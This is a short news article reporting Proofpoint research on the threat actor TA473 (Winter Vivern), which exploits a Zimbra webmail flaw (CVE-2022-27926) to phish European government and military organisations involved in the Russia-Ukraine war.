The dramatic geopolitical situation in Ukraine continues to have implications in Europe, with more and more cybercriminal activity targeting Western infrastructure. A recent search of Proofpoint highlights new hacker attacks aimed at European countries that join NATO. Specifically, the experts report the activities of a group called TA473which exploits a Zimbra vulnerability to target the webmail portals of major European governments.
The researchers explain that TA473 is an Advanced Persistent Threat (APT) actor that exploits Zimbra’s CVE-2022-27926 vulnerability to hack Zimbra-hosted webmail portals. Proofpoint’s report suggests that the goal of this activity is gain access to emails from military, government and diplomatic organizations in Europe involved in the Russian-Ukrainian war.
How the TA473 hacker attacks on NATO countries work
After an initial reconnaissance, the hackers organize phishing attacks via email, posing as harmless and significant government resources. As is often the case with phishing emails, the message contains a Malicious URL. This, when clicked, executes a JavaScript payload within the victims’ webmail portals.
Enabling custom and labor-intensive payloads allow hackers to steal usernames, passwords, and store active session tokens and CSRFs from cookies, facilitating access to public webmail portals belonging to NATO-aligned organizations.
Proofpoint researchers recently promoted TA473 to a publicly tracked threat actor. Known in open-source research as Winter Vivern, Proofpoint has been tracking its activities since at least 2021.
Leave a Reply
View Comments